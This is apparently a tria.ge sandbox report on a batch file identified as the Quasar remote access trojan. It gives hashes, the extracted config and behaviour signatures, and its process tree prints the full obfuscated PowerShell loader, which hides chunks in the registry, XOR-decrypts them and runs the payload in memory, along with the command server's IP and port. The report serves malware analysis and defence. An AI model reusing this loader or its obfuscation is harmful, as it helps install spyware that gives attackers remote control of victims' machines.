Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

a.cmd

windows7-x64

1

a.cmd

windows10-2004-x64

10

Analysis

  • max time kernel
    127s
  • max time network
    143s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    28/01/2025, 00:06 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    a.cmd

  • Size

    4.2MB

  • MD5

    8e53db2a2b188768e4c23344be407467

  • SHA1

    99dd0a15c342904542a6f2f0b9eed3a8c68aff68

  • SHA256

    bfcdaed93c4c3605be7e800daac4299c4aa0df0218798cb64c2e2f01027989b2

  • SHA512

    d7533b52cd188b2f62ea35c0c7774fb5e5d1c824ac96221d8d32a8a73a4f4e29f73ef5cfb968e76def16c2c32f4a35ea6422e3945b9b2d6eb21809ec18a389b6

  • SSDEEP

    49152:bXMw/hbcpR1DHQJLN+Z/8AEUCm5feXp8dv6Hkn1uX+OiqK67KFly6TteW5SEVAAl:G

Score
10/10
quasarexecutionspywaretrojan

Malware Config

Extracted

Family

quasar

Mutex

"&Rj@���:@b;���

Attributes
  • encryption_key

    2F93492D384FEB71103635232F1BD56A2FEFBDE7

  • reconnect_delay

    3000

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

    trojanspywarequasar
  • Quasar family
    quasar
  • Quasar payload 1 IoCs
  • Blocklisted process makes network request 6 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

    execution
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a.cmd"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3100
    • C:\Windows\system32\conhost.exe
      conhost --headless powershell -nop -w hidden -c " $kdot_file='C:\Users\Admin\AppData\Local\Temp\a.cmd';${kd`OTvshygfkWqz} = .([char](((-14750 -Band 8742) + (-14750 -Bor 8742) + 7778 - 1699))+[char](((-3885 -Band 1045) + (-3885 -Bor 1045) - 4263 + 7204))+[char](((-8757 -Band 2626) + (-8757 -Bor 2626) + 2514 + 3733))+[char](((-1429 -Band 8075) + (-1429 -Bor 8075) + 2571 - 9172))+[char]((6708 - 8850 + 6131 - 3922))+[char]((20409 - 8699 - 2979 - 8620))+[char]((-225 - 6768 + 1896 + 5207))+[char]((14212 - 9087 - 3231 - 1778))+[char]((-3397 - 842 + 3123 + 1217))+[char](((1337 -Band 1487) + (1337 -Bor 1487) - 9959 + 7245))+[char]((-5146 - 574 + 1549 + 4287))) $kdOt_fILe -Raw;$KDOtbmoqtlKbef = ([SYsTem.TeXT.encODINg]::UTf8.gEtsTRiNG((72, 75, 67, 85, 58, 0x5c, 83, 111, 102, 116, 0x77, 97, 114, 101, 0x5c, 0x43, 0x68, 0x72, 111, 109, 0x65, 85, 112)) + [SYSTem.TEXT.ENCOdiNg]::UTf8.GetSTrinG((100, 97, 116, 0x65, 54, 105, 100, 111, 0x76)));if (-not (.([char]((15732 - 8133 + 432 - 7947))+[char]((19257 - 7156 - 9718 - 2282))+[char](((-2734 -Band 4889) + (-2734 -Bor 4889) + 5262 - 7302))+[char]((9588 - 4977 + 2556 - 7051))+[char]((-2864 - 4413 + 8947 - 1625))+[char](((-8636 -Band 1645) + (-8636 -Bor 1645) - 2511 + 9582))+[char](((-3354 -Band 4437) + (-3354 -Bor 4437) + 4248 - 5234))+[char](((892 -Band 9414) + (892 -Bor 9414) - 8468 - 1722))+[char](((-26991 -Band 8995) + (-26991 -Bor 8995) + 8283 + 9817))) $kdOtBMOQtlkbEF)) { .([char]((19517 - 7856 - 3443 - 8140))+[char]((9609 - 410 - 1625 - 7473))+[char](((-16567 -Band 8743) + (-16567 -Bor 8743) + 6179 + 1764))+[char]((8472 - 2614 - 5448 - 365))+[char](((-4905 -Band 5487) + (-4905 -Bor 5487) - 4009 + 3500))+[char]((17129 - 3580 - 5916 - 7517))+[char](((-334 -Band 987) + (-334 -Bor 987) - 4441 + 3889))+[char]((2919 - 3613 + 5539 - 4736))) -Path $KdOtBMOQtlKbEf -Force };1..3 | .([char]((5230 - 3406 + 4954 - 6741))) {.([char]((13622 - 3875 - 1701 - 7963))+[char](((-2220 -Band 3626) + (-2220 -Bor 3626) - 3277 + 1972))+[char](((-6904 -Band 7564) + (-6904 -Bor 7564) - 2348 + 1804))+[char]((20570 - 3263 - 7526 - 9736))+[char]((14089 - 319 - 9486 - 4211))+[char]((5210 - 7844 + 7448 - 4698))+[char]((-3544 - 1541 + 1919 + 3267))+[char]((-10168 - 4861 + 8079 + 7059))+[char]((9248 - 8742 - 8501 + 8075))+[char]((10753 - 2291 - 5809 - 2539))+[char](((-5427 -Band 1323) + (-5427 -Bor 1323) + 7263 - 3048))+[char]((-695 - 1116 - 1123 + 3046))+[char](((-469 -Band 5539) + (-469 -Bor 5539) + 427 - 5396))+[char]((7556 - 8591 + 1345 - 196))+[char](((-13963 -Band 7760) + (-13963 -Bor 7760) - 2652 + 8971))+[char]((-285 - 373 + 735 + 44))) -Path $kDOtBmoqtLkBef -Name (([SYSTeM.TEXt.encoDING]::Utf8.GETsTRIng((0x4b, 0x44, 0x4f)) + [SysTEM.teXT.EncoDiNg]::utF8.GetstrIng(84))+$_) -Value (${KDOTvSh`YG`Fkwqz} | .([char]((281 - 716 - 6236 + 6754))+[char]((-880 - 5976 + 5141 + 1816))+[char](((750 -Band 9582) + (750 -Bor 9582) - 4152 - 6072))+[char]((-2961 - 3861 + 6110 + 813))+[char]((-508 - 1973 - 5327 + 7907))+[char]((1349 - 1221 + 6754 - 6766))+[char](((-16074 -Band 3997) + (-16074 -Bor 3997) + 5113 + 7009))+[char]((14865 - 4694 - 1572 - 8516))+[char]((7287 - 2419 - 2735 - 2017))+[char]((7818 - 929 - 7680 + 905))+[char]((9979 - 6348 - 6206 + 2680))+[char]((3538 - 9003 - 4373 + 9948))+[char](((-194 -Band 3911) + (-194 -Bor 3911) - 6575 + 2961))) -Pattern (([sySTEm.tExT.eNcodiNG]::uTf8.gETsTring((0x3a, 0x4b, 0x44, 0x4f)) + [sYsTeM.Text.ENcoDing]::utf8.GeTStRinG(84))+$_+([sYStEM.tExt.eNCoDinG]::UTF8.GeTstRING((58, 58)) + [syStEM.text.ENCOdIng]::UTF8.GetsTRinG((40, 46, 42, 41))))).matches.grOUPS[1].VAlue -Force};.([char]((-886 - 28 - 35 + 1032))+[char]((-761 - 4941 + 7273 - 1470))+[char]((7374 - 2058 + 2879 - 8079))+[char]((-5821 - 2214 + 8534 - 454))+[char](((-25447 -Band 9661) + (-25447 -Bor 9661) + 7083 + 8776))+[char](((-23455 -Band 9818) + (-23455 -Bor 9818) + 9297 + 4456))+[char](((-6428 -Band 4075) + (-6428 -Bor 4075) - 1283 + 3737))+[char](((-17878 -Band 1703) + (-17878 -Bor 1703) + 9351 + 6933))+[char]((-4143 - 2770 + 7712 - 719))+[char]((17249 - 8050 - 3465 - 5620))+[char](((-10170 -Band 9313) + (-10170 -Bor 9313) + 4107 - 3139))+[char]((1901 - 785 - 9888 + 8884))+[char]((8557 - 3578 - 821 - 4057))+[char](((-5146 -Band 3353) + (-5146 -Bor 3353) + 4090 - 2183))+[char]((1171 - 1513 + 9247 - 8789))+[char]((2522 - 5998 + 912 + 2685))) -Path $KdoTbmOQtLKbeF -Name ([sySTEm.tEXt.ENCoDiNG]::utf8.getsTrIng((75, 68, 79)) + [sYSTEM.tExt.EncodINg]::utF8.gEtStrinG((84, 52))) -Value ([SYsTEM.TEXT.ENCoDing]::utF8.GeTstRInG((73, 106, 69, 67, 86, 56, 84, 80, 74, 88, 76, 107, 66, 55, 48, 117))) -Force;${k`DOtttPPe`ZraFi} = [SYSteM.TExT.eNCoDInG]::UTF8.gETBYteS((.([char]((-6530 - 7684 + 4771 + 9514))+[char]((3714 - 9852 - 3645 + 9884))+[char]((1324 - 5556 + 644 + 3704))+[char](((-4147 -Band 6727) + (-4147 -Bor 6727) - 8734 + 6199))+[char](((4845 -Band 3263) + (4845 -Bor 3263) - 1255 - 6780))+[char]((7917 - 6788 - 5342 + 4329))+[char](((6331 -Band 3572) + (6331 -Bor 3572) - 2969 - 6833))+[char]((21235 - 6007 - 7708 - 7411))+[char](((-795 -Band 3035) + (-795 -Bor 3035) + 4931 - 7091))+[char]((-3411 - 4619 + 7921 + 223))+[char]((13446 - 1786 - 4349 - 7200))+[char](((-1217 -Band 9401) + (-1217 -Bor 9401) - 540 - 7532))+[char]((-1221 - 1063 + 8983 - 6598))+[char](((2905 -Band 57) + (2905 -Bor 57) - 1658 - 1190))+[char]((21808 - 7648 - 5793 - 8251))+[char]((-1881 - 3141 + 9522 - 4379))) -Path $KDOtBmOqtLKBef KDOT4).kDot4);${`Kdot`XQjEw`Inego} = [CoNvert]::FrOMBaSE64StRiNg((.([char]((480 - 1598 + 6824 - 5635))+[char](((-8522 -Band 6253) + (-8522 -Bor 6253) + 5667 - 3297))+[char](((-20193 -Band 5067) + (-20193 -Bor 5067) + 7759 + 7483))+[char](((-17922 -Band 6310) + (-17922 -Bor 6310) + 4973 + 6684))+[char](((-10123 -Band 9428) + (-10123 -Bor 9428) + 1246 - 478))+[char](((-20709 -Band 5925) + (-20709 -Bor 5925) + 7895 + 7005))+[char]((-7490 - 5819 + 7058 + 6352))+[char]((14683 - 9715 - 5282 + 423))+[char](((-18847 -Band 9498) + (-18847 -Bor 9498) + 1791 + 7638))+[char]((-7266 - 1582 - 445 + 9407))+[char]((6628 - 3923 + 2692 - 5286))+[char]((5109 - 9189 + 6227 - 2035))+[char]((8399 - 8486 - 5273 + 5461))+[char](((3539 -Band 4269) + (3539 -Bor 4269) - 8376 + 682))+[char]((11064 - 3164 - 6494 - 1290))+[char]((-6505 - 2289 + 5881 + 3034))) -Path $kdOTBMoqtLkBeF KDOT1).KdoT1);$KdOtbhBtrrrWvn = [BytE[]]::NeW(${`KDOtXqjeWine`G`O}.LeNGtH);for (${KDotZqravJjWvK}=0;${`K`DotzQrav`J`JWvk} -lt ${kdotXQJeWIneGO}.LenGth;${kd`OtzqravJ`Jwvk}++) {$KDotbHbtrrrwvn[${KdotzqravjjwvK}]=${K`DotxqjEWinego}[${KdotzqravjJwvK}] -bxor ${KdOtttPpe`ZraF`I}[${k`DotZ`Qravj`Jwvk} % ${`Kd`Ott`T`Ppezrafi}.LEngtH]};[SyStEM.rEfLECTion.ASsEmBlY]::LOaD($KDOtBhbtrrrwvn).EntRyPoInT.INVOkE($nULL,@(,[string[]]@()))"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3924
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -nop -w hidden -c " $kdot_file='C:\Users\Admin\AppData\Local\Temp\a.cmd';${kd`OTvshygfkWqz} = .([char](((-14750 -Band 8742) + (-14750 -Bor 8742) + 7778 - 1699))+[char](((-3885 -Band 1045) + (-3885 -Bor 1045) - 4263 + 7204))+[char](((-8757 -Band 2626) + (-8757 -Bor 2626) + 2514 + 3733))+[char](((-1429 -Band 8075) + (-1429 -Bor 8075) + 2571 - 9172))+[char]((6708 - 8850 + 6131 - 3922))+[char]((20409 - 8699 - 2979 - 8620))+[char]((-225 - 6768 + 1896 + 5207))+[char]((14212 - 9087 - 3231 - 1778))+[char]((-3397 - 842 + 3123 + 1217))+[char](((1337 -Band 1487) + (1337 -Bor 1487) - 9959 + 7245))+[char]((-5146 - 574 + 1549 + 4287))) $kdOt_fILe -Raw;$KDOtbmoqtlKbef = ([SYsTem.TeXT.encODINg]::UTf8.gEtsTRiNG((72, 75, 67, 85, 58, 0x5c, 83, 111, 102, 116, 0x77, 97, 114, 101, 0x5c, 0x43, 0x68, 0x72, 111, 109, 0x65, 85, 112)) + [SYSTem.TEXT.ENCOdiNg]::UTf8.GetSTrinG((100, 97, 116, 0x65, 54, 105, 100, 111, 0x76)));if (-not (.([char]((15732 - 8133 + 432 - 7947))+[char]((19257 - 7156 - 9718 - 2282))+[char](((-2734 -Band 4889) + (-2734 -Bor 4889) + 5262 - 7302))+[char]((9588 - 4977 + 2556 - 7051))+[char]((-2864 - 4413 + 8947 - 1625))+[char](((-8636 -Band 1645) + (-8636 -Bor 1645) - 2511 + 9582))+[char](((-3354 -Band 4437) + (-3354 -Bor 4437) + 4248 - 5234))+[char](((892 -Band 9414) + (892 -Bor 9414) - 8468 - 1722))+[char](((-26991 -Band 8995) + (-26991 -Bor 8995) + 8283 + 9817))) $kdOtBMOQtlkbEF)) { .([char]((19517 - 7856 - 3443 - 8140))+[char]((9609 - 410 - 1625 - 7473))+[char](((-16567 -Band 8743) + (-16567 -Bor 8743) + 6179 + 1764))+[char]((8472 - 2614 - 5448 - 365))+[char](((-4905 -Band 5487) + (-4905 -Bor 5487) - 4009 + 3500))+[char]((17129 - 3580 - 5916 - 7517))+[char](((-334 -Band 987) + (-334 -Bor 987) - 4441 + 3889))+[char]((2919 - 3613 + 5539 - 4736))) -Path $KdOtBMOQtlKbEf -Force };1..3 | .([char]((5230 - 3406 + 4954 - 6741))) {.([char]((13622 - 3875 - 1701 - 7963))+[char](((-2220 -Band 3626) + (-2220 -Bor 3626) - 3277 + 1972))+[char](((-6904 -Band 7564) + (-6904 -Bor 7564) - 2348 + 1804))+[char]((20570 - 3263 - 7526 - 9736))+[char]((14089 - 319 - 9486 - 4211))+[char]((5210 - 7844 + 7448 - 4698))+[char]((-3544 - 1541 + 1919 + 3267))+[char]((-10168 - 4861 + 8079 + 7059))+[char]((9248 - 8742 - 8501 + 8075))+[char]((10753 - 2291 - 5809 - 2539))+[char](((-5427 -Band 1323) + (-5427 -Bor 1323) + 7263 - 3048))+[char]((-695 - 1116 - 1123 + 3046))+[char](((-469 -Band 5539) + (-469 -Bor 5539) + 427 - 5396))+[char]((7556 - 8591 + 1345 - 196))+[char](((-13963 -Band 7760) + (-13963 -Bor 7760) - 2652 + 8971))+[char]((-285 - 373 + 735 + 44))) -Path $kDOtBmoqtLkBef -Name (([SYSTeM.TEXt.encoDING]::Utf8.GETsTRIng((0x4b, 0x44, 0x4f)) + [SysTEM.teXT.EncoDiNg]::utF8.GetstrIng(84))+$_) -Value (${KDOTvSh`YG`Fkwqz} | .([char]((281 - 716 - 6236 + 6754))+[char]((-880 - 5976 + 5141 + 1816))+[char](((750 -Band 9582) + (750 -Bor 9582) - 4152 - 6072))+[char]((-2961 - 3861 + 6110 + 813))+[char]((-508 - 1973 - 5327 + 7907))+[char]((1349 - 1221 + 6754 - 6766))+[char](((-16074 -Band 3997) + (-16074 -Bor 3997) + 5113 + 7009))+[char]((14865 - 4694 - 1572 - 8516))+[char]((7287 - 2419 - 2735 - 2017))+[char]((7818 - 929 - 7680 + 905))+[char]((9979 - 6348 - 6206 + 2680))+[char]((3538 - 9003 - 4373 + 9948))+[char](((-194 -Band 3911) + (-194 -Bor 3911) - 6575 + 2961))) -Pattern (([sySTEm.tExT.eNcodiNG]::uTf8.gETsTring((0x3a, 0x4b, 0x44, 0x4f)) + [sYsTeM.Text.ENcoDing]::utf8.GeTStRinG(84))+$_+([sYStEM.tExt.eNCoDinG]::UTF8.GeTstRING((58, 58)) + [syStEM.text.ENCOdIng]::UTF8.GetsTRinG((40, 46, 42, 41))))).matches.grOUPS[1].VAlue -Force};.([char]((-886 - 28 - 35 + 1032))+[char]((-761 - 4941 + 7273 - 1470))+[char]((7374 - 2058 + 2879 - 8079))+[char]((-5821 - 2214 + 8534 - 454))+[char](((-25447 -Band 9661) + (-25447 -Bor 9661) + 7083 + 8776))+[char](((-23455 -Band 9818) + (-23455 -Bor 9818) + 9297 + 4456))+[char](((-6428 -Band 4075) + (-6428 -Bor 4075) - 1283 + 3737))+[char](((-17878 -Band 1703) + (-17878 -Bor 1703) + 9351 + 6933))+[char]((-4143 - 2770 + 7712 - 719))+[char]((17249 - 8050 - 3465 - 5620))+[char](((-10170 -Band 9313) + (-10170 -Bor 9313) + 4107 - 3139))+[char]((1901 - 785 - 9888 + 8884))+[char]((8557 - 3578 - 821 - 4057))+[char](((-5146 -Band 3353) + (-5146 -Bor 3353) + 4090 - 2183))+[char]((1171 - 1513 + 9247 - 8789))+[char]((2522 - 5998 + 912 + 2685))) -Path $KdoTbmOQtLKbeF -Name ([sySTEm.tEXt.ENCoDiNG]::utf8.getsTrIng((75, 68, 79)) + [sYSTEM.tExt.EncodINg]::utF8.gEtStrinG((84, 52))) -Value ([SYsTEM.TEXT.ENCoDing]::utF8.GeTstRInG((73, 106, 69, 67, 86, 56, 84, 80, 74, 88, 76, 107, 66, 55, 48, 117))) -Force;${k`DOtttPPe`ZraFi} = [SYSteM.TExT.eNCoDInG]::UTF8.gETBYteS((.([char]((-6530 - 7684 + 4771 + 9514))+[char]((3714 - 9852 - 3645 + 9884))+[char]((1324 - 5556 + 644 + 3704))+[char](((-4147 -Band 6727) + (-4147 -Bor 6727) - 8734 + 6199))+[char](((4845 -Band 3263) + (4845 -Bor 3263) - 1255 - 6780))+[char]((7917 - 6788 - 5342 + 4329))+[char](((6331 -Band 3572) + (6331 -Bor 3572) - 2969 - 6833))+[char]((21235 - 6007 - 7708 - 7411))+[char](((-795 -Band 3035) + (-795 -Bor 3035) + 4931 - 7091))+[char]((-3411 - 4619 + 7921 + 223))+[char]((13446 - 1786 - 4349 - 7200))+[char](((-1217 -Band 9401) + (-1217 -Bor 9401) - 540 - 7532))+[char]((-1221 - 1063 + 8983 - 6598))+[char](((2905 -Band 57) + (2905 -Bor 57) - 1658 - 1190))+[char]((21808 - 7648 - 5793 - 8251))+[char]((-1881 - 3141 + 9522 - 4379))) -Path $KDOtBmOqtLKBef KDOT4).kDot4);${`Kdot`XQjEw`Inego} = [CoNvert]::FrOMBaSE64StRiNg((.([char]((480 - 1598 + 6824 - 5635))+[char](((-8522 -Band 6253) + (-8522 -Bor 6253) + 5667 - 3297))+[char](((-20193 -Band 5067) + (-20193 -Bor 5067) + 7759 + 7483))+[char](((-17922 -Band 6310) + (-17922 -Bor 6310) + 4973 + 6684))+[char](((-10123 -Band 9428) + (-10123 -Bor 9428) + 1246 - 478))+[char](((-20709 -Band 5925) + (-20709 -Bor 5925) + 7895 + 7005))+[char]((-7490 - 5819 + 7058 + 6352))+[char]((14683 - 9715 - 5282 + 423))+[char](((-18847 -Band 9498) + (-18847 -Bor 9498) + 1791 + 7638))+[char]((-7266 - 1582 - 445 + 9407))+[char]((6628 - 3923 + 2692 - 5286))+[char]((5109 - 9189 + 6227 - 2035))+[char]((8399 - 8486 - 5273 + 5461))+[char](((3539 -Band 4269) + (3539 -Bor 4269) - 8376 + 682))+[char]((11064 - 3164 - 6494 - 1290))+[char]((-6505 - 2289 + 5881 + 3034))) -Path $kdOTBMoqtLkBeF KDOT1).KdoT1);$KdOtbhBtrrrWvn = [BytE[]]::NeW(${`KDOtXqjeWine`G`O}.LeNGtH);for (${KDotZqravJjWvK}=0;${`K`DotzQrav`J`JWvk} -lt ${kdotXQJeWIneGO}.LenGth;${kd`OtzqravJ`Jwvk}++) {$KDotbHbtrrrwvn[${KdotzqravjjwvK}]=${K`DotxqjEWinego}[${KdotzqravjJwvK}] -bxor ${KdOtttPpe`ZraF`I}[${k`DotZ`Qravj`Jwvk} % ${`Kd`Ott`T`Ppezrafi}.LEngtH]};[SyStEM.rEfLECTion.ASsEmBlY]::LOaD($KDOtBhbtrrrwvn).EntRyPoInT.INVOkE($nULL,@(,[string[]]@()))"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        PID:3880

Network

  • flag-us
    DNS
    8.8.8.8.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    8.8.8.8.in-addr.arpa
    IN PTR
    Response
    8.8.8.8.in-addr.arpa
    IN PTR
    dnsgoogle
  • flag-us
    DNS
    58.55.71.13.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    58.55.71.13.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    172.214.232.199.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    172.214.232.199.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    2.159.190.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    2.159.190.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    5.114.82.104.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    5.114.82.104.in-addr.arpa
    IN PTR
    Response
    5.114.82.104.in-addr.arpa
    IN PTR
    a104-82-114-5deploystaticakamaitechnologiescom
  • flag-us
    DNS
    97.17.167.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    97.17.167.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    241.42.69.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    241.42.69.40.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    200.163.202.172.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    200.163.202.172.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    86.49.80.91.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    86.49.80.91.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    172.210.232.199.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    172.210.232.199.in-addr.arpa
    IN PTR
    Response
  • 193.124.205.56:350
    powershell.exe
    260 B
     5
  • 193.124.205.56:350
    powershell.exe
    260 B
     5
  • 193.124.205.56:350
    powershell.exe
    260 B
     5
  • 193.124.205.56:350
    powershell.exe
    260 B
     5
  • 193.124.205.56:350
    powershell.exe
    260 B
     5
  • 193.124.205.56:350
    powershell.exe
    260 B
     5
  • 8.8.8.8:53
    8.8.8.8.in-addr.arpa
    dns
    66 B
     90 B
     1
    1

    DNS Request

    8.8.8.8.in-addr.arpa

  • 8.8.8.8:53
    58.55.71.13.in-addr.arpa
    dns
    70 B
     144 B
     1
    1

    DNS Request

    58.55.71.13.in-addr.arpa

  • 8.8.8.8:53
    172.214.232.199.in-addr.arpa
    dns
    74 B
     128 B
     1
    1

    DNS Request

    172.214.232.199.in-addr.arpa

  • 8.8.8.8:53
    2.159.190.20.in-addr.arpa
    dns
    71 B
     157 B
     1
    1

    DNS Request

    2.159.190.20.in-addr.arpa

  • 8.8.8.8:53
    5.114.82.104.in-addr.arpa
    dns
    71 B
     135 B
     1
    1

    DNS Request

    5.114.82.104.in-addr.arpa

  • 8.8.8.8:53
    97.17.167.52.in-addr.arpa
    dns
    71 B
     145 B
     1
    1

    DNS Request

    97.17.167.52.in-addr.arpa

  • 8.8.8.8:53
    241.42.69.40.in-addr.arpa
    dns
    71 B
     145 B
     1
    1

    DNS Request

    241.42.69.40.in-addr.arpa

  • 8.8.8.8:53
    200.163.202.172.in-addr.arpa
    dns
    74 B
     160 B
     1
    1

    DNS Request

    200.163.202.172.in-addr.arpa

  • 8.8.8.8:53
    86.49.80.91.in-addr.arpa
    dns
    70 B
     145 B
     1
    1

    DNS Request

    86.49.80.91.in-addr.arpa

  • 8.8.8.8:53
    172.210.232.199.in-addr.arpa
    dns
    74 B
     128 B
     1
    1

    DNS Request

    172.210.232.199.in-addr.arpa

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zon4tc0x.ehy.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • memory/3880-16-0x00007FFA5E940000-0x00007FFA5F401000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3880-18-0x000001D3A8570000-0x000001D3A858E000-memory.dmp

    Filesize

    120KB

    Download

  • memory/3880-11-0x00007FFA5E940000-0x00007FFA5F401000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3880-12-0x00007FFA5E940000-0x00007FFA5F401000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3880-13-0x00007FFA5E940000-0x00007FFA5F401000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3880-14-0x000001D38F820000-0x000001D38F828000-memory.dmp

    Filesize

    32KB

    Download

  • memory/3880-15-0x000001D3A8330000-0x000001D3A833A000-memory.dmp

    Filesize

    40KB

    Download

  • memory/3880-0-0x00007FFA5E943000-0x00007FFA5E945000-memory.dmp

    Filesize

    8KB

    Download

  • memory/3880-10-0x000001D38F7D0000-0x000001D38F7F2000-memory.dmp

    Filesize

    136KB

    Download

  • memory/3880-19-0x000001D3A87F0000-0x000001D3A8B1A000-memory.dmp

    Filesize

    3.2MB

    Download

  • memory/3880-17-0x000001D3A8630000-0x000001D3A86A6000-memory.dmp

    Filesize

    472KB

    Download

  • memory/3880-20-0x000001D3A92D0000-0x000001D3A9320000-memory.dmp

    Filesize

    320KB

    Download

  • memory/3880-21-0x000001D3A93E0000-0x000001D3A9492000-memory.dmp

    Filesize

    712KB

    Download

  • memory/3880-22-0x000001D3A9670000-0x000001D3A9832000-memory.dmp

    Filesize

    1.8MB

    Download

  • memory/3880-23-0x00007FFA5E943000-0x00007FFA5E945000-memory.dmp

    Filesize

    8KB

    Download

  • memory/3880-24-0x00007FFA5E940000-0x00007FFA5F401000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3880-25-0x00007FFA5E940000-0x00007FFA5F401000-memory.dmp

    Filesize

    10.8MB

    Download

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.